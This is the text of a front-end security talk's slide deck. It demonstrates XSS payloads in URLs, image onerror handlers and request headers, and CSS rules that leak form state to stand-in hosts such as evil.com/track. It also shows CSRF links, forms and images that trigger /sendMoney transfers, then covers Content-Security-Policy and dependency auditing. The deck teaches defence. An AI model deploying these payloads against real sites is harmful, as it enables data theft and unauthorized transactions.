Benedek Gagyi
Web dev.
@BenedekGagyi
@BenedekGagyi
@BenedekGagyi
@BenedekGagyi
@BenedekGagyi
@BenedekGagyi
@BenedekGagyi
@BenedekGagyi
Malicious script
Site containing malicious script
@BenedekGagyi
@BenedekGagyi
https://www.mybank.com?name=<script>alert(1)</script>
@BenedekGagyi
URL containing malicious script
Site containing malicious script
Request made using malicious URL
@BenedekGagyi
@BenedekGagyi
@BenedekGagyi
@BenedekGagyi
<div><script title="</div>">
<div>
<script title="</div>">
</script>
</div>
@BenedekGagyi
<script><div title="</script>"
<script>
<div title="
</script>
"
@BenedekGagyi
@BenedekGagyi
@BenedekGagyi
@BenedekGagyi
@BenedekGagyi
background-image:
url(www.evil-site.com/track)
@BenedekGagyi
.two-factor-checkbox:checked {
background-image:
url(www.evil.com/track?no2fa=true);
}
.security-tips-link:visited {
background-image:
url(www.evil.com/track?uneducated=true);
}
@BenedekGagyi
.meeting-location[value="SPY HEADQUARTERS"]{
background-image:
url(www.evil.com/track?loc=SpyHeadquaters);
}
@BenedekGagyi
<html>
</html>
Malicious link
<a href="...
html {
background-image:
url(/sendMoney?
amount=100&
to=123);
}
@BenedekGagyi
@BenedekGagyi
<a
href="
/sendMoney?
amount=100&
to=123
"
>
</a>
@BenedekGagyi
<form
action="
/sendMoney?
amount=100&
to=123
"
>
<button>Click me for free pizza</button>
</form>
@BenedekGagyi
@BenedekGagyi
@BenedekGagyi
<img
src="invalid.address"
onerror="alert(':P')"
/>
<img src="https://bank.com/
send_money?
amount=9999&
to=1231234143"
/>
@BenedekGagyi
@BenedekGagyi
<script>alert(":P")</script>
True-Client-IP:
@BenedekGagyi
User-Agent:
<script>alert(":P")</script>
@BenedekGagyi
@BenedekGagyi
@BenedekGagyi
@BenedekGagyi
@BenedekGagyi
script-src
style-src
image-src
...
www.content-security-policy.com
@BenedekGagyi
'none'
'self'
domain.example.com
https://
data:
*
'unsafe-inline'
...
@BenedekGagyi
Content-Security-Policy
-Report-Only
report-uri/report-to
@BenedekGagyi
@BenedekGagyi
@BenedekGagyi
@BenedekGagyi
@BenedekGagyi
npm/yarn audit
snyk
aquasec
npq
@BenedekGagyi
@BenedekGagyi
@BenedekGagyi
@BenedekGagyi
By Benedek Gagyi
Security for front-end developers. Deck aimed for 1h (45 min) presentation.